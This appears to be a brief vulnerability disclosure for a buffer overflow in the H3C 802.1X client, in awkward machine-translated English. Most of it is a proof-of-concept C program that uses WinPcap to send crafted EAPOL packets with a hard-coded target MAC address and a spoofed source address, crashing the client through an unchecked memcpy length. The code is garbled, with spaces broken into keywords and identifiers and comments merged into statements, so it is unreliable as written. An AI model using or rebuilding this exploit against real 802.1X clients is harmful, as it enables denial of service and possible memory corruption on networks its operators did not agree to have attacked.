The H3C 802.1X client does not validate the key data, causing the buffer to overflow the sub_4030E0 function. The memcpy function is called at 4031F6. If the buffer length field of the memcpy function is maliciously constructed, the poc code is as follows:
# Include <pcap. h> # pragma comment (lib, "wpcap. lib ") int _ tmain (int argc, _ TCHAR * argv []) {pcap_t * fp; char errbuf [PCAP_ERRBUF_SIZE]; u_char packet [3000]; pcap_if_t * alldevs; /* Check the validity of the command line */if (pcap_findalldevs (& alldevs, errbuf) =-1) {fprintf (stderr, "Error in pcap_findalldevs: % s \ n ", errbuf); exit (1);} pcap_if_t * d; int I = 0;/* Print the list */for (d = alldevs; d; d = d-> next) {pri Ntf ("% d. % s ", ++ I, d-> name); if (d-> description) printf (" (% s) \ n ", d-> description ); elseprintf ("(No description available) \ n");}/* select the corresponding Nic */if (fp = pcap_open_live (alldevs-> name, // name of the device65536, // portion of the packet to capture. it doesn't matter in this case 1, // promiscuous mode (nonzero means promiscuous) 1000, // read timeouterrbuf // error buffer) = NULL) {fprintf (stderr, "\ nUnab Le to open the adapter. % s is not supported by WinPcap \ n ", argv [1]); return 2;} memset (packet, 0, 1000 ); /* target machine mac address */packet [0] = 0x00; packet [1] = 0x0C; packet [2] = 0x29; packet [3] = 0x0F; packet [4] = 0x63; packet [5] = 0xDD;/* set mac source to 2: 2: 2: 2: 2: 2: 2 */packet [6] = 2; packet [7] = 2; packet [8] = 2; packet [9] = 2; packet [10] = 2; packet [11] = 2;/* protocol header */packet [12] = 0x88; packet [13] = 0x8e; packet [14] = 0x01; packe T [15] = 0x00; packet [16] = 0xFF; packet [17] = 0xFF; packet [18] = 0x01; packet [19] = 0x03; packet [20] = 0x05; // packet [22] = 0x01; if (pcap_sendpacket (fp, // Adapterpacket, // buffer with the packet100 // size )! = 0) {fprintf (stderr, "\ nError sending the packet: % s \ n", pcap_geterr (fp); return 3;} packet [22] = 0x07; if (pcap_sendpacket (fp, // Adapterpacket, // buffer with the packet100 // size )! = 0) {fprintf (stderr, "\ nError sending the packet: % s \ n", pcap_geterr (fp); return 3;} packet [18] = 0x0A; packet [19] = 0x03; packet [20] = 0x05; // packet [22] = 0x19; // packet [23] = 0x19; // packet [24] = 0x39; // packet [25] = 0x00; // * Send down the packet */if (pcap_sendpacket (fp, // Adapterpacket, // buffer with the packet100 // size )! = 0) {fprintf (stderr, "\ nError sending the packet: % s \ n", pcap_geterr (fp); return 3;} pcap_close (fp); return 0 ;}
Run the client, enter the user name and password, and click to start cognitive attack code. The program overflows and crashes.